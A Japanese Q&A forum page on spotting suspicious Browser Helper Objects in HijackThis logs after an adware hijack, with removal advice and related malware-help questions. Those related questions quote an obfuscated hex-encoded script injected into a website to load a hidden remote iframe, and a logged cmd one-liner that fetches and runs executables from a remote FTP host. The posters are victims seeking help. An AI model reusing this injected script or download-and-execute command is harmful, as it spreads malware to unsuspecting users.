[スパイウェア]不審なBHOの特定方法とは?
- [スパイウェア]どのBHOがあやしいか特定する方法について解説します。
- スパイウェアに感染した際に、不審なBHOを特定する方法をご紹介します。
- スパイウェア対策に役立つ情報として、不審なBHOを特定する方法をまとめました。
- ベストアンサー
[スパイウェア]どのBHOがあやしいか。
書き換えられる部分: Search Assistant 書き換えられる値: ランダムっぽい。少なくても毎回違うところ。 ----以上spybot常駐時---- O2 - BHO: (no name) - {7B55BB05-0B4D-44fd-81A6-B136188F5DEB} - C:\WINDOWS\questmod.dll O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.02.0002.1001\en-xu\stmain.dll O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file) O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx ----以上Hijack Thisの中からあやしそうな奴--- [症状] (IEのトップはYahooJPになっていた。) 前日、わけあって、 Yahooツールバーを追加し始めたが、時間が異様に長いのでCtrl+Alt+Deleteで脱出 その後、YahooJPにアクセス Spybotから妙に多くポップアップされる。 Yahooとのやりとりかと思っていくつか許可したかもしれない(←多分これが原因) 結果、数個アイコンがデスクトップに配置されており IEにはバー(青っぽい)が追加されている。 即、spybotで検索をかけたところ、CoolWWWSearchとあったため 「これが、巷で有名な・・・」と思いつつ、修正。 Spybotには検索されないものの、 予想どおり直っていないので、CoolWebShredderを使ったが検出されず。 そこで、HijackThisでログをとり、 賢者の回答を待つことにした
- himajin2005_RC4
- お礼率29% (15/51)
- ウィルス・マルウェア
- 回答数3
- ありがとう数3
- みんなの回答 (3)
- 専門家の回答
質問者が選んだベストアンサー
最近「BHO」を使ったアドウエアが増えています。 ★ブラウザーハイジャック スタートアップや検索ページをハイジャックして広告会社のページ等を強制的に表示させるものです。 ☆「HijackThis」 簡単な仕組みのものは「HijackThis」だけでも駆除できます。 下記で始まる行の中に怪しい設定が表示されます。 O2 - BHO: O4 - HKLM\..\Run: O4 - HKCU\..\Run: O4 - HKLM\..\RunServices: O4 - HKCU\..\RunServices: O16 - DPF: ★O4 [DashMags] 殆ど情報がありません。 こういう場合、このファイルのプロパティを調べます。 「会社名」「製品名」が空白の場合削除してみます。 ★O9 Extra button:Related -{c95fe080-8f5d-11d2-a20b-00aa003c157a}-C:\Windows\web\Related.htm Related.htmを開いてみます。 ★O16 DPF:{DA9A0B1E-9B7B-11D3-B8A4-00C04F79641C} これだけでは解りません。 参照されるURLやファイル名を見て判断します。 ☆urlmon.dll ファイルのプロパティを調べると正規のファイルだとわかります。 削除すると何が起こるかわかりません。 ★ttp://directplugin.com/tl7000.dll 一寸危険ですが、そのURLへアクセスしてみます。 多分、tl7000.dllをダウンロードする設定と思います。 今回のBHOでは「O16 - DPF:」は使われていないかもしれません。 複合汚染の可能性があるんではないでしょうか。 色々勉強して、スパイウエア、ウィルスの撃退にご協力ください。
その他の回答 (2)
- heto2
- ベストアンサー率43% (227/525)
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file) FlashGet関連のポンカス 「Fix」推奨
お礼
以下#1のお礼すべて消したらバーが消えました! ありがとうございました! #中には消してはいけないものもあったかもしれないが
補足
Fixしました
- heto2
- ベストアンサー率43% (227/525)
O2 - BHO: (no name) - {7B55BB05-0B4D-44fd-81A6-B136188F5DEB} - C:\WINDOWS\questmod.dll ただし、これだけでは直りません。
お礼
お礼欄に書くのも変ですが あやしそうなもの O4 [DashMags] C:\Progra~1\ITCH CASH\CHIC ELSE.exe O9 Extra button:Related -{c95fe080-8f5d-11d2-a20b-00aa003c157a}-C:\Windows\web\Related.htm O16 DPF:{DA9A0B1E-9B7B-11D3-B8A4-00C04F79641C} - があやしそうです urlmon.dllとか http://directplugin.com/tl7000.dllも あやしそうですが
補足
セーフモードから起動して、 ファイルを別な場所に移動させました。 ・・・ご指摘どおり直っておりませんね ・・・これだけでは直らないってことなので 追加できそうな情報を判断してみます ※一気にログを貼り付けることもできたけど これやるととても長くなるため。 また、自分の勉強にもあまりならないし。
関連するQ&A
- ■HijackThis v1.98.2での結果です。スパイはいますか?■
HijackThis v1.98.2のログです。 削除すべきものを教えて下さい。 O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - H:\spybot\SPYBOT~1\SDHelper.dll O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe" O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe" O4 - HKLM\..\Run: [Advanced Tools Check] C:\PROGRA~1\NORTON~2\AdvTools\ADVCHK.EXE O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O9 - Extra button: 監視 - {B492B1EC-052D-4FB6-8DD6-4DFE16EFC516} - G:\DL_DXT10\INetMon.dll O9 - Extra 'Tools' menuitem: 監視の開始/停止 - {B492B1EC-052D-4FB6-8DD6-4DFE16EFC516} - G:\DL_DXT10\INetMon.dll O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) -
- ベストアンサー
- ウィルス・マルウェア
- IEのツールバーに表示されているask searchが削除できません
Free Video Dubをインストールした時にask toolbarも勝手にインストールされてしまいました。 プログラムの追加と削除でアンインストールしましたがIEのask searchが表示されたままでとても鬱陶しいです。 Hijackthisを使って完全に削除しようとしましたが 既にプログラムの追加と削除でアンインストールしてしまったのかHijackthisでスキャンしても R3 - URLSearchHook: (no name) - {9CB65206-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\4.bin\A5SRCHAS.DLL O2 - BHO: Ask Search Assistant BHO - {9CB65201-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\4.bin\A5SRCHAS.DLL O2 - BHO: Ask Toolbar BHO - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\4.bin\ASKTBAR.DLL の項目が見つからず、どうしようもない状態です。 どうすれば完全に削除できますでしょうか? システムの復元は復元ポイントがないので不可能です。 セーフモードで起動してスキャンしてもこの項目はありませんでした。 回答よろしくお願いします
- 締切済み
- Windows Vista
- Emsisoft Anti-Malware
先ほどトロイの木馬で質問した者です。 不安でしたので、Emsisoft Anti-Malware 無料の非常駐型のセキュリティーソフトで検索したところ、 4件の脅威が発見されました……が、……。 その4件が下記です。 C:\ProgramData\Kaspersky Lab\AVP13\QB\01f4596f4821024f.klq -> (Quarantine-6) 検出: Gen:Variant.Adware.BHO.Bprotector.1 (B) C:\ProgramData\Kaspersky Lab\AVP13\QB\8780e72a55f5c9f7.klq -> (Quarantine-6) -> (NSIS o) -> lzma_nsis0005 -> protector.dll 検出: Gen:Variant.Adware.BHO.Bprotector.1 (B) C:\ProgramData\Kaspersky Lab\AVP13\QB\8fbba17e62e34190.klq -> (Quarantine-6) -> (NSIS o) -> lzma_nsis0005 -> protector.dll 検出: Gen:Variant.Adware.BHO.Bprotector.1 (B) C:\ProgramData\Kaspersky Lab\AVP13\QB\bd5abd1082b20677.klq -> (Quarantine-6) 検出: Gen:Variant.Adware.BHO.Bprotector.1 (B) これは、どう解釈すればいいのでしょうか……? まさか、常駐しているカスペルスキーの中……?
- ベストアンサー
- ウィルス・マルウェア
- Delsim Dialerが駆除できません
昨日から、ネット接続がいきなり切られ、ウインドウが現れて長距離電話をかけさせようとします。調べたところ、Delsim Dialerというマルウェアらしいです。閉じるボタンを押せば消えるのですが、ネットに再接続するとまた何分後かに切られてしまいます C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk C:\Program Files\Common Files\delsim\del.exe この2つが悪者らしいのですが、手動で削除しても再起動すると復活してしまいます。 セーフモードでAvast!で検索しても感染0と出ます。 HijackThisでログを取ったところ O4 - hp-1003.exe O17- NameServer = 202.238.95.24 202.238.95.26 O23 - \\210.139.143.28\Admin$\15082.exe この3つが怪しいように思えます。削除しても大丈夫でしょうか? またほかにこの憎らしいDialerを駆除する方法はありますか? よろしくお願いいたします。 以下にHijackThisのログを載せます。2000字以下にするため、関係なさそうなものは削除しています。 Logfile of HijackThis v1.99.1 Scan saved at 4:38:48, on 2007/06/05 Platform: Windows 2000 SP4 (WinNT 5.00.2195) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - D:\Program Files\Java\jre1.6.0_01\bin\ssv.dll O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - D:\WINNT\system32\msdxm.ocx O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon O4 - HKLM\..\Run: [PRPCMonitor] PRPCUI.exe O4 - HKCU\..\RunServices: [File Mapping Services] hp-1003.exe O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Program Files\Java\jre1.6.0_01\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Program Files\Java\jre1.6.0_01\bin\ssv.dll O17 - HKLM\System\CCS\Services\Tcpip\..\{33D6F442-2C64-422A-B819-A7548403837E}: NameServer = 202.238.95.24 202.238.95.26 O20 - Winlogon Notify: tphotkey - D:\WINNT\SYSTEM32\tphklock.dll O23 - Service: 60143 - Unknown owner - \\210.139.143.28\Admin$\15082.exe (file missing) O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - D:\WINNT\System32\dmadmin.exe O23 - Service: Events Log (Event) - Unknown owner - D:\WINNT\system32\drivers\csrss.exe (file missing) O23 - Service: Copyright (C) 2001-2005 S3 Graphics, Inc. (S3 Graphics, Inc.) - Unknown owner - D:\WINNT\VTTimer.exe O23 - Service: Serv-U FTP Server (Serv-U) - Unknown owner - D:\WINNT\system32\MSupdate.exe (file missing) O23 - Service: Service Controller (Services) - Unknown owner - D:\WINNT\services.exe (file missing)
- ベストアンサー
- スパイウェア
- 怪しいiframeあり、スパイウェア警告が出ます
私のHPからリンクしている知人のサイトがあります。 その知人サイトを開いたときに「スパイウェア警告が出た」と私のHPのゲストブックに書き込みがありました。 連絡してくださった方の環境やどのような警告だったのかは分かりません。 プラグインやスクリプト系は全部切って、Operaでそのサイトのトップページを保存してエディタで開いてみたところ、BODYの最初にこんなタグが入っていました。 <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47597c712c521(v47597c712d107){ function v47597c712d4ea () {var v47597c712d8d2=16; return v47597c712d8d2;} return(parseInt(v47597c712d107,v47597c712d4ea()));}function v47597c712dcb9(v47597c712e09d){ var v47597c712e488='';for(v47597c712e86d=0; v47597c712e86d<v47597c712e09d.length; v47597c712e86d+=2){ v47597c712e488+=(String.fromCharCode(v47597c712c521(v47597c712e09d.substr(v47597c712e86d, 2))));}return v47597c712e488;} document.write(v47597c712dcb9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D38383932633136207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3632323734292B273064385C272077696474683D323931206865696768743D323134207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> これがスパイウェアのコードなのでしょうか? また、スパイウェアだとしたら、今回のスパイウェアがどのような類のものなのか解説や対処方法が掲載されたURL(あるいは検索用キーワード)を教えていただけませんでしょうか。 よろしくお願いします。
- ベストアンサー
- スパイウェア
- スパイウェアが駆除できません。困っています
CAの無料スパイウェアスキャンをやってみたのですが、 なんとスパイウェアが2個も発見されました。 ・Trackware "MarketScore" Key "hkey_local_machine \software\microsoft\code store database\distribution units\{35b7e48b-9d81-4c6c-9578-5fd4f620d886 ・Trojan "Trojan.Win32.FTP Attack" Key "hkey_local_machine \software\microsoft\windows\currentversion\run" value "reminder" すぐにNorton2007、Spybot、Ad-Awareでのフルスキャン(セーフモードのスキャンも)を行いました。 WindowsDefenderでのスキャンもやってみました。 その後もう一度、CAでのスキャンを試しましたが変わりませんでした。 もう、どうすればいいかわかりません。パソコンのOSはxpです。 よろしくお願いします。
- ベストアンサー
- スパイウェア
- スパイウェア?
PCを起動していると当然PCが動き出してコマンドプロンプトを立ち上げたり、ファイル名を指定して実行するなどに不明なコマンドが残っています。 おかしいと思ってから、spybotやadawareなどをインストールしてスキャンしてみましたが、状況は変わらず、最終手段としてOSを再インストールしてみたのですが、状況は変わりませんでした。 データ復旧用のHDDにウィルス・スパイウェアのようなものが残っているのでしょうか? どうすればよいか分かりません。 どなたか対応策がわかればご教授下さい。 以下にキーロガーにて残っていた履歴を載せます。 宜しくお願いします。 環境 OS:winXPsp2 対ウィルスソフト:ノートンインターネットセキュリティ2008 ログ [ActiveWindow => V^XN] 0:59:30 [RETURN] 0:59:32 [SHIFT] 0:59:32 [53] 0:59:32 s 0:59:32 y 0:59:32 s 0:59:33 t 0:59:33 e 0:59:33 m 0:59:33 r 0:59:33 o 0:59:33 o 0:59:33 t 0:59:33 [SHIFT] 0:59:33 [53] 0:59:34 [53] 0:59:34 s 0:59:34 y 0:59:34 s 0:59:34 t 0:59:34 e 0:59:34 m 0:59:34 [51] 0:59:35 [50] 0:59:35 [50] 0:59:35 c 0:59:35 m 0:59:35 d 0:59:35 d 0:59:35 e 0:59:35 x 0:59:36 e [ActiveWindow => Windows ^XN }l[W] 0:59:36 [RETURN] 1:5:37 f 1:5:37 f [ActiveWindow => V^XN] 1:5:38 [RETURN] /*--------------ClipBoard Start-----------------*/ cmd /c echo open 220.130.37.43 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get PI.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &PI.exe &exit /*--------------ClipBoard Exit-----------------*/ 1:5:45 v 1:5:45 [Ctrl] [ActiveWindow => Windows ^XN }l[W] 1:5:47 [RETURN] 1:6:30 f 1:6:30 f [ActiveWindow => V^XN] 1:6:31 [RETURN] /*--------------ClipBoard Start-----------------*/ cmd /c echo open 220.130.37.43 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &DB.exe &exit /*--------------ClipBoard Exit-----------------*/
- ベストアンサー
- スパイウェア
- 化学の未定係数法について質問です
未定係数法について教えて いただけたら嬉しいです。お願いします。 短いのだと解けるのですが‥ Cu+HNO(3)→Cu(NO(3))(2)+H(2)O+NO(2) a.b.c.d.eとおいて cu a=C H b=2b N b=2c+e O 3b=6c+d+2e b=1 というのは理解できてるんですが 計算ができません。 数学の基礎ができてないんですかね 泣 わからないので どなたか解き方を できたら分かりやすく教えてください! お願いします ()で囲まれた数字は 小さい数字です。わかりづらくて すみません。
- 締切済み
- 化学
- SELECT実行結果のレスポンス改善について
いつもお世話になっております。 Oracle9i+XP(CPU=PentiumCore2Duo,メモリ=2MB)の環境にて、以下のようなSELECT文なのですが、実行結果が出るまでに約45分もかかってしまいます。 何が悪いのか切り分けるために、以下の副問い合わせのみを切り取ってSQLPLUSで実行してみると15件ずつが約10秒おきに返ってくるという現象が確認できたため、おそらくこの副問い合わせではないかと思っております。 データ件数としては、ZAIテーブルが約6万件、MEISAIテーブルが約12万件、VIEW_ROOM_CALENDERビューが約6千件で、それ以外はしれとります。 一応すべてのテーブルのキーにはインデックスがはられているようです。 色々と調べてautotraceにて実行計画などを見てみましたが正直よくわかりませんでした。 テーブル構造やリレーション、カラム数、レコード長など情報が少なく大変申し訳ないのですが必要であれば提示させていただきますので、SQL文がおかしいとか、ネック部分の調べ方とか、なにかヒントのようなものでも結構ですので、どなたかご教授いただけませんでしょうか? 宜しくお願い致します。 select D.KANJYA_NO || ',' || D.NAME || ',' || A.BYOU_NAME || ',' || count(COL_PT) || ',' || count(COL_OT) || ',' || count(COL_ST) from ( -- 副問い合わせ select B.KANJYA_NO as KAN_NO, B.KAIKEI_DATE, G.BYOUTOU_NAME as BYOU_NAME, (case when C.MASTER_CODE in ('01017' , '01022' , '01025') then B.TOTAL_KAISUU else NULL end) as COL_PT, (case when C.MASTER_CODE in ('01019' , '01021' , '01023') then B.TOTAL_KAISUU else NULL end) as COL_OT, (case when C.MASTER_CODE in ('01016' , '01020' , '01024') then B.TOTAL_KAISUU else NULL end) as COL_ST from ZAI&1 B inner join MEISAI&1 C on C.NYUUGAI = B.NYUUGAI and C.KANJYA_NO = B.KANJYA_NO and C.ZAI_NO = B.ZAI_NO and C.KAIKEI_DATE = B.KAIKEI_DATE and B.KAIKEI_DATE Like '&1' || '%' and B.NYUUGAI = 2 and B.KANJYA_NO not like '*%' and C.MASTER_CODE in ('01017','01022','01025','01019','01021','01023','01016','01020','01024') inner join NYUUIN_ROOM E on C.KANJYA_NO = E.KANJYA_NO inner join VIEW_ROOM_CALENDER H on E.KANJYA_NO = H.KANJYA_NO and C.KAIKEI_DATE = H.YYYYMMDD and lpad(E.ROOM_NO,'10','0') = TO_NUMBER(H.ROOM_NO) inner join ROOM_TABLE F on E.ROOM_CODE = F.ROOM_CODE inner join BYT_TABLE G on G.BYOUTOU_CODE = F.BYOUTOU_CODE ) A inner join KANJYA D on A.KAN_NO = D.KANJYA_NO group by D.KANJYA_NO, D.NAME, D.BIRTH, A.BYOUTOU_NAME ;
- ベストアンサー
- Oracle
- これってスパイウェア or 安全・・?
MicrosoftWindowsIEFirewallBypass がDドライブのSpyBotのスキャンで出てきたのですが、これはスパイウェアでしょうか、それともウィンドウズのアップデートで入ったもので安全でしょうか。 PC環境はC:Me, D;XP, EFほか・・全FAT32 Dドライブ~XP-Pro-SP2、 フレッツ・セーフティーでルーターにウィルスバスターが入ってますので、PCにはSpyBotしか入ってません。
- ベストアンサー
- スパイウェア
補足
駆除したと思ったら復活。 余計なものまでさらに消したかもしれない(汗) そーいえば、いろいろ消してったらCD/DVD関係が 何かおかしくなったなぁ(おぃ) (自分のマシンではなく兄のマシンですが) ぱっと見わからない項目が多く、 スパイウェアっぽいわけでもない (いつもタスクマネージャで起動しているファイル名ばかりいくつも見かける) で、復活して困っていて、ふと コントロールパネルのプログラムの追加と削除がありました→駆除完了。 あ、示していただいた方法、かなり参考になりました!